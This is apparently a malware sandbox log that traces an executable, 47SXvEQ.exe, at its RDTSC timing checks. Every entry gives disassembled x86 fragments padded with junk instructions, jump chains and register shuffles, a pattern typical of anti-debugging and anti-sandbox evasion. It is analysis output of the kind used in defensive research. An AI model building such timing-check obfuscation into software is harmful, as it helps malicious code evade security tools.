Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0BCF second address: 5EF0C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub edi, edi 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c mov edi, 3D8A7F52h 0x00000011 popad 0x00000012 test dword ptr [ebp+0Ch], FFFF0000h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, D611h 0x00000020 pushfd 0x00000021 jmp 00007F87BD02CC8Eh 0x00000026 sbb ch, 00000068h 0x00000029 jmp 00007F87BD02CC8Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0C0E second address: 5EF0C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0C14 second address: 5EF0C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F882CD62C8Ah 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 pushfd 0x00000013 jmp 00007F87BD02CC96h 0x00000018 add cx, 5AF8h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BD02CC90h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0C66 second address: 5EF0C75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0C75 second address: 5EF0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B87Ah 0x00000007 jmp 00007F87BD02CC8Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov esi, 2F81321Bh 0x00000018 mov ch, D4h 0x0000001a popad 0x0000001b call 00007F87BD02CC89h 0x00000020 pushad 0x00000021 mov ebx, 4A13F6FCh 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d sbb al, 0000007Eh 0x00000030 jmp 00007F87BD02CC99h 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a call 00007F87BD02CC8Ah 0x0000003f pushfd 0x00000040 jmp 00007F87BD02CC92h 0x00000045 xor ax, 5BA8h 0x0000004a jmp 00007F87BD02CC8Bh 0x0000004f popfd 0x00000050 pop eax 0x00000051 pushfd 0x00000052 jmp 00007F87BD02CC99h 0x00000057 and ecx, 413567C6h 0x0000005d jmp 00007F87BD02CC91h 0x00000062 popfd 0x00000063 popad 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F87BD02CC93h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0D50 second address: 5EF0D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0D56 second address: 5EF0D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0D6D second address: 5EF0D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0D84 second address: 5EF0DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 pushfd 0x00000012 jmp 00007F87BD02CC90h 0x00000017 jmp 00007F87BD02CC95h 0x0000001c popfd 0x0000001d popad 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F87BD02CC99h 0x0000002a jmp 00007F87BD02CC8Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0DF0 second address: 5EF0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F87BC5165BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F87BC5165C1h 0x00000017 sub esi, 42714966h 0x0000001d jmp 00007F87BC5165C1h 0x00000022 popfd 0x00000023 mov dh, cl 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b call 00007F87BC5165C2h 0x00000030 push esi 0x00000031 pop edi 0x00000032 pop eax 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 mov ah, E2h 0x00000038 mov dl, C3h 0x0000003a popad 0x0000003b mov dword ptr [esp], edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F87BC5165C3h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0E85 second address: 5EF0EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0EAB second address: 5EF0EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0F00 second address: 5EF0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0F06 second address: 5EF0F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0F17 second address: 5F008E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F87BD02CC8Eh 0x00000011 retn 0008h 0x00000014 mov dword ptr [ebp-14h], eax 0x00000017 mov dword ptr [ebp-04h], 00000000h 0x0000001e lea eax, dword ptr [ebp-30h] 0x00000021 push eax 0x00000022 call 00007F87BD02D81Ah 0x00000027 jmp 00007F87C2B2B943h 0x0000002c mov edi, edi 0x0000002e pushad 0x0000002f mov cx, 3899h 0x00000033 mov dx, ax 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d mov cx, bx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F008E0 second address: 5F00909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F87BC5165BEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00909 second address: 5F0091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0091F second address: 5F00923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00923 second address: 5F0093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0093E second address: 5F0099A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F87BC5165BEh 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 jmp 00007F87BC5165C0h 0x00000018 cmp dword ptr [ecx], 30h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F87BC5165C7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0099A second address: 5F009E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD46504h 0x0000000f pushad 0x00000010 jmp 00007F87BD02CC8Ch 0x00000015 pushad 0x00000016 movzx ecx, dx 0x00000019 jmp 00007F87BD02CC8Dh 0x0000001e popad 0x0000001f popad 0x00000020 push 00000001h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F009E5 second address: 5F009E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F009E9 second address: 5F009EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F009EF second address: 5F009F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F009F5 second address: 5F00A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F87BD02CC89h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BD02CC96h 0x00000014 sub al, 00000028h 0x00000017 jmp 00007F87BD02CC8Bh 0x0000001c popfd 0x0000001d call 00007F87BD02CC98h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00A47 second address: 5F00A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00A54 second address: 5F00A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00A67 second address: 5F00A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F87BC5165C0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00A8A second address: 5F00AC0 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushfd 0x0000000a jmp 00007F87BD02CC95h 0x0000000f sub cx, B4B6h 0x00000014 jmp 00007F87BD02CC91h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00AC0 second address: 5F00B0B instructions: 0x00000000 rdtsc 0x00000002 mov si, 5AA7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F87BC5165BDh 0x00000012 pop eax 0x00000013 jmp 00007F87BC5165BEh 0x00000018 push 00000000h 0x0000001a jmp 00007F87BC5165C0h 0x0000001f sub edx, edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F87BC5165BCh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0BEC second address: 5EE0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0BF0 second address: 5EE0C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0C0D second address: 5EE0C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0C13 second address: 5EE0C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0C17 second address: 5EE0C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC95h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0C37 second address: 5EE0CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F87BC5165BEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F87BC5165C0h 0x00000016 sub eax, eax 0x00000018 jmp 00007F87BC5165C1h 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F87BC5165BEh 0x00000025 nop 0x00000026 pushad 0x00000027 mov edx, eax 0x00000029 mov ah, E1h 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F87BC5165C4h 0x00000032 nop 0x00000033 pushad 0x00000034 mov dx, 3F20h 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F87BC5165BBh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0CC2 second address: 5EE0D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F87BD02CC97h 0x00000012 push 1D65F928h 0x00000017 jmp 00007F87BD02CC8Fh 0x0000001c xor dword ptr [esp], 5D65F929h 0x00000023 jmp 00007F87BD02CC96h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push edi 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D1F second address: 5EE0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D24 second address: 5EE0D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D33 second address: 5EE0D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D49 second address: 5EE0D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D4F second address: 5EE0D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D53 second address: 5EE0D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0D57 second address: 5EE0DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F87BC5165C7h 0x0000000e push dword ptr [ebp+34h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F87BC5165C4h 0x00000018 or ch, 00000048h 0x0000001b jmp 00007F87BC5165BBh 0x00000020 popfd 0x00000021 mov eax, 3FBED4BFh 0x00000026 popad 0x00000027 mov ecx, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F87BC5165C1h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0DBB second address: 5EE0DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0DC1 second address: 5EE0DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0ED6 second address: 5EE0EE1 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0D02 second address: 5ED0D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F87BC5165C7h 0x00000008 pop ecx 0x00000009 mov bh, 8Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov di, 3634h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0D2A second address: 5ED0D4A instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BD02CC93h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0D4A second address: 5ED0D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0721 second address: 5ED0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0739 second address: 5ED0757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165C3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED080B second address: 5ED0826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0826 second address: 5ED082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED082C second address: 5ED0830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0830 second address: 5ED0721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 jmp 00007F87BC5165C7h 0x0000000e retn 0008h 0x00000011 mov dword ptr [004106C4h], eax 0x00000016 push 00403072h 0x0000001b push dword ptr [004106C0h] 0x00000021 call 00007F87BC516F12h 0x00000026 jmp 00007F87C1FE5156h 0x0000002b mov edi, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F87BC5165C7h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED05CC second address: 5ED05E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED05E8 second address: 5ED05FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED050F second address: 5ED0532 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F87BD02CC91h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0532 second address: 5ED0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0536 second address: 5ED054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC8Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED054E second address: 5ED055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00BB9 second address: 5F00BD1 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d movzx esi, bx 0x00000010 popad 0x00000011 push ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00BD1 second address: 5F00BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00BEE second address: 5F00BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00BFE second address: 5F00C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007F87BC5165C7h 0x00000010 mov edi, dword ptr [ebp+0Ch] 0x00000013 jmp 00007F87BC5165C6h 0x00000018 test edi, FFFE0000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov esi, edi 0x00000023 pushfd 0x00000024 jmp 00007F87BC5165C9h 0x00000029 and eax, 3526E536h 0x0000002f jmp 00007F87BC5165C1h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00C77 second address: 5F00CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD47E39h 0x0000000f jmp 00007F87BD02CC8Eh 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 jmp 00007F87BD02CC90h 0x0000001c cmp ecx, FFFFFFFFh 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F87BD02CC8Eh 0x00000026 sbb eax, 4A193DE8h 0x0000002c jmp 00007F87BD02CC8Bh 0x00000031 popfd 0x00000032 jmp 00007F87BD02CC98h 0x00000037 popad 0x00000038 je 00007F882CD47DE1h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00CFD second address: 5F00D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D01 second address: 5F00D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D07 second address: 5F00D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp ecx, 0000FFFFh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
